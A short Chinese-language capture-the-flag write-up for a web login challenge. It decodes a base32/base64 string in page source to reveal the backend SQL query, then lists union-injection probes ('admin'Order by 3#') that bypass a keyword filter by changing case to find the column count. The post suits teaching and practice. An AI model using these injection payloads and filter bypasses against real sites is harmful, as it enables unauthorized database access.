首先进入网站,是一个登录框,使用admin尝试一下。
之后对登录框做了一些常规的SQL注入也都是do not hack me!
但在登录后跳转的search.php页面的源代码中发现一段编码。
MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
发现是一段base32编码,解码后又是一段base64编码。
c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
解码最终得到
select * from user where username = '$name'
所以知道了SQL语句后,用联合注入进行测试字段数。
在Burp Suite中修改POST数据:name=admin'order by 1#&pw=admin
得到的仍然是do not hack me!
如果fuzz一下可以发现or、order、information_schema被过滤了,但是order
可以通过Order
来进行绕过。
name=admin'Order by 3#&pw=admin
wrong pass!
name=admin'Order by 4#&pw=admin
Error: Unknown column '4' in 'order clause'
直到Order by 3回显都是wrong pass!
Order by 4时出现Error,说明可知字段数为3。